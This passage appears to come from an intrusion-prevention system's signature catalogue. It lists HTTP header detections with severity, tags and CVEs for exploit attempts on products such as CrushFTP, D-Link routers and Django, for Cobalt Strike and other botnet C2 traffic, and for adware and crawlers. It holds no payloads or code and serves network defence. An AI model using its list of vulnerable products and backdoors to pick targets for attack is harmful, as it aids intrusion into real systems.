Tags: Any Operating System, Any Hardware, Cisco Smart Licensing Utility, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Cisco-Smart-Licensing-Utility-Static-Administrative-Credentials-CVE-2024-20439
Description:
Back to top

HTTP_CSH-Citrix-NetScaler-SD-WAN-CGISESSID-Command-Execution-CVE-2017-6316

About this situation: An attempt to exploit a vulnerability in Citrix NetScaler SD-WAN detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix SD-WAN, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Citrix-NetScaler-SD-WAN-CGISESSID-Command-Execution-CVE-2017-6316
Description:
Back to top

HTTP_CSH-Clamav-Update-Agent-Usage

About this situation: ClamAV update agent usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, ClamAV, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-210-2032
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Clearsearch

About this situation: ClearSearch traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ClearSearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Clearsearch
Description:
Back to top

HTTP_CSH-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-50623

About this situation: An attempt to exploit a vulnerability in Cleo VLTrader detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cleo VLTrader, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1811-5242
Last changed: sgpkg-ips-1813-5242
Vulnerability: Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-50623
Description:
Back to top

HTTP_CSH-Click2findnow

About this situation: Click2FindNow traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Click2FindNow, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Click2findnow
Description:
Back to top

HTTP_CSH-ClickSpring-PuritySCAN-Application-Usage

About this situation: ClickSpring.PuritySCAN Application Usage
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ClickSpring.PuritySCAN, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-615-5211
Vulnerability: ClickSpring-PuritySCAN-Application-Usage
Description:
Back to top

HTTP_CSH-CMS-Made-Simple-Cache-Poisoning

About this situation: An attempt to exploit a vulnerability in CMS Made Simple detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CMS Made Simple, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1641-5242
Vulnerability: CMS-Made-Simple-Cache-Poisoning
Description:
Back to top

HTTP_CSH-Cobalt-Strike-C2-HTTP-Traffic

About this situation: Cobalt Strike C2 HTTP traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Cobalt-Strike-C2-HTTP-Traffic
Description:
Back to top

HTTP_CSH-Codesys-V3-Cmpwebserverhandler-Memgcgetsize-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1500-5242
Vulnerability: Codesys-V3-Cmpwebserverhandler-Memgcgetsize-Integer-Overflow
Description:
Back to top

HTTP_CSH-ColdFusion-Admin-Password-DoS

About this situation: Possible buffer overflow attempt against ColdFusion server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ColdFusion, CVE2000, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1584-5242
Vulnerability: HTTP-ColdFusion-Admin-Password-DoS
Description:
Back to top

HTTP_CSH-Connection-Upgrade-Request

About this situation: Client requested protocol switch
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1470-5242
Description:
Back to top

HTTP_CSH-Conspy

About this situation: ConSpy traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ConSpy, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Conspy
Description:
Back to top

HTTP_CSH-Contec-Conprosys-HMI-System-Cpostgresql.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Contec CONPROSYS HMI System (CHS) detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Contec CONPROSYS HMI System, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1579-5242
Vulnerability: Contec-Conprosys-HMI-System-Cpostgresql.php-SQL-Injection
Description:
Back to top

HTTP_CSH-CrushFTP-S3-Authentication-Bypass-CVE-2025-2825

About this situation: An attempt to exploit a vulnerability in CrushFTP detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CrushFTP, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1861-5242
Last changed: sgpkg-ips-1861-5242
Vulnerability: CrushFTP-S3-Authentication-Bypass-CVE-2025-2825
Description:
Back to top

HTTP_CSH-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040

About this situation: An attempt to exploit a vulnerability in CrushFTP detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CrushFTP, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1861-5242
Vulnerability: CrushFTP-Server-Side-Template-Injection-CVE-2024-4040
Description:
Back to top

HTTP_CSH-Curl-Tool-Usage

About this situation: cURL command line tool usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, cURL, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-60-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-CyberArk-Password-Vault-Web-Access-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in CyberArk Password Vault Web Access was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, CyberArk Password Vault Web Access, CVE2018, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: CyberArk-Password-Vault-Web-Access-Remote-Code-Execution
Description:
Back to top

HTTP_CSH-Cycbot-Bot-Traffic

About this situation: Cycbot Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Cycbot-Bot
Description:
Back to top

HTTP_CSH-D-Link-Backdoor-CVE-2013-6026

About this situation: An attempt to exploit a known backdoor in D-Link Routers detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: D-Link-Backdoor-CVE-2013-6026
Description:
Back to top

HTTP_CSH-D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839

About this situation: An attempt to exploit a vulnerability in D-Link DIR-615 detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DIR-615, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839
Description:
Back to top

HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution

About this situation: An attempt to exploit a vulnerability in a D-Link HNAP SOAPAction header detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2015, CVE2019, CVE2022, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: D-Link-HNAP-SOAPAction-Header-Command-Execution
D-Link-DIR-806-HNAP-SOAPAction-Header-Command-Execution-CVE-2019-10891
D-Link-GORT-AC750-HNAP-SOAPAction-Header-Command-Execution-CVE-2022-37056
D-Link-DIR-845-HNAP-SOAPAction-Header-Command-Execution-CVE-2024-33112
Description:
Back to top

HTTP_CSH-D-Link-HNAP-SOAPAction-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in D-Link Wi-Fi router detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: D-Link-HNAP-SOAPAction-Stack-Overflow
Description:
Back to top

HTTP_CSH-Debian-Advanced-Packaging-Tool

About this situation: Debian Advanced Packaging Tool download detected
Context: HTTP Request Header Line
Severity: 1
Tags: Debian GNU/Linux, Any Hardware, Debian GNU/Linux not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Delfin-Media-Viewer-g181511-User-Agent

About this situation: Delfin Media Viewer activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Delfin Media Viewer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Delfin-Media-Viewer
Description:
Back to top

HTTP_CSH-Delfin-Media-Viewer-PromulGate-User-Agent

About this situation: Delfin Media Viewer activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Delfin Media Viewer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Delfin-Media-Viewer
Description:
Back to top

HTTP_CSH-Deluge-Client

About this situation: Deluge P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Deluge, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Deluge-P2P-Client

About this situation: Deluge P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Dialerpornpaq

About this situation: DialerPornpaq traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, DialerPornpaq, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Dialerpornpaq
Description:
Back to top

HTTP_CSH-Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Digiumphones detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-1584-5242
Vulnerability: Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow
Description:
Back to top

HTTP_CSH-Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1584-5242
Vulnerability: Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion
Description:
Back to top

HTTP_CSH-Digmine-Cryptocurrency-Miner

About this situation: A HTTP request resembling Digmine Cryptocurrency Miner Malware traffic
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1027-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Digmine-Cryptocurrency-Miner
Description:
Back to top

HTTP_CSH-Directory-Traversal-In-Cookie-Header

About this situation: A directory traversal sequence in a HTTP Cookie header
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1774-5242
Description:
Back to top

HTTP_CSH-Directory-Traversal-In-Session-Id-Cookie

About this situation: An attempt to exploit a vulnerability in GlobalProtect detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, GlobalProtect, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400
Description:
Back to top

HTTP_CSH-Dirtjumper-Traffic

About this situation: DirtJumper traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Bot:-Dirtjumper-Traffic-Detected
Description:
Back to top

HTTP_CSH-Django-Get_Supported_Language_Variant-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Django Software Foundation Django detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Django-Get_Supported_Language_Variant-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion

About this situation: An attempt to exploit a vulnerability in Django Software Foundation Django detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Django-Parse_accept_Lang_Header-Accept-Language-Resource-Exhaustion
Description:
Back to top

HTTP_CSH-DotBot-Web-Spider

About this situation: DotBot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, DotBot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-DotNetNuke-Cookie-Deserialization-RCE

About this situation: An attempt to exploit a vulnerability in DotNetNuke detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, DotNetNuke, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: DotNetNuke-Cookie-Deserialization-RCE
Description:
Back to top

HTTP_CSH-Dreamloader-Bot-Traffic

About this situation: Dreamloader Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Dreamloader-Bot
Description:
Back to top

HTTP_CSH-Droidpak-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Trojan.Droidpak-Botnet
Description:
Back to top

HTTP_CSH-Ebates-Moneymaker

About this situation: Ebates MoneyMaker activity detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Ebates MoneyMaker, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Ebates-Moneymaker
Description:
Back to top

HTTP_CSH-Edge-Browser-Usage

About this situation: Edge browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Microsoft Edge, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow

About this situation: An EFS Software Easy File Management Web Server UserID Buffer Overflow vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, EFS Software Easy File Management Web Server, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1733-5242
Vulnerability: EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow
Description:
Back to top

HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EFS Software Easy File Sharing Web Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, EFS Software Easy File Sharing Web Server, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1733-5242
Vulnerability: EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
Description:
Back to top

HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EFS Software Easy File Sharing Web Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, EFS Software Easy File Sharing Web Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1733-5242
Vulnerability: EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Ekeoil-Malware-C2-Traffic

About this situation: Ekeoil malware C2 traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Ekeoil-Malware-C2-Traffic
Description:
Back to top

HTTP_CSH-Electron-Based-Application-Usage

About this situation: Electron application usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Electron, Any Operating System not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Elog-Project-Elog-Retrieve_URL-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in ELOG Project ELOG detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ELOG, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1266-5242
Vulnerability: Elog-Project-Elog-Retrieve_URL-Information-Disclosure
Description:
Back to top

HTTP_CSH-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in EmbedThis GoAhead detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, EmbedThis GoAhead, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1500-5242
Vulnerability: Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Empty-Host-Header

About this situation: Empty HTTP Host header detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1641-5242
Description:
Back to top

HTTP_CSH-Enhanced-CTorrent-P2P-Client

About this situation: Enhanced CTorrent P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Entireweb-Speedy-Web-Spider

About this situation: Entireweb Speedy web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Entireweb Speedy Spider, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-ESSP-Connection-Request

About this situation: Client requested an Extended Security Session Protocol (ESSP) connection
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-521-5211
Description:
Back to top

HTTP_CSH-Euniverse-Perfectnav

About this situation: Possible eUniverse PerfectNav adware detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, eUniverse PerfectNav, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Euniverse-Perfectnav
Description:
Back to top

HTTP_CSH-Exalead-Exabot-Web-Spider

About this situation: Exalead Exabot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Exalead Exabot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-ExB-Language-Crawler

About this situation: ExB Language Crawler detected.
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic web spider, Any Operating System not specific, Generic web spider not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-518-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Excessively-Large-Content-Length-Value

About this situation: An excessively large Content-Length value detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2006, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1584-5242
Vulnerability: HTTP-Nagios-Content-Length-Handling-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Excessively-Long-Basic-Authorization-Header

About this situation: An excessively long authorization header with basic scheme
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Free Download Manager, CVE2009, CVE2018, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1865-5242
Vulnerability: Free-Download-Manager-Remote-Control-Authorization-Header-Buffer-Overflow
D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839
Description:
Back to top

HTTP_CSH-Exploit-Specific-Shared-Variables

About this situation: This fingerprint sets shared variables.
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1425-5242
Description:
Back to top

HTTP_CSH-Ezula

About this situation: EZula traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Ezula
Description:
Back to top

HTTP_CSH-F-Prot-Anti-Virus-Update-Agent-Usage

About this situation: F-Prot Anti-Virus update agent usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, F-Prot Anti-Virus, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-F-Secure-ORSP-Client-User-Agent

About this situation: F-Secure Online Reputation Service Platform Client user-agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986

About this situation: An attempt to exploit a vulnerability in F5 iControl REST detected
Context: HTTP Request Header Line
Severity: 7
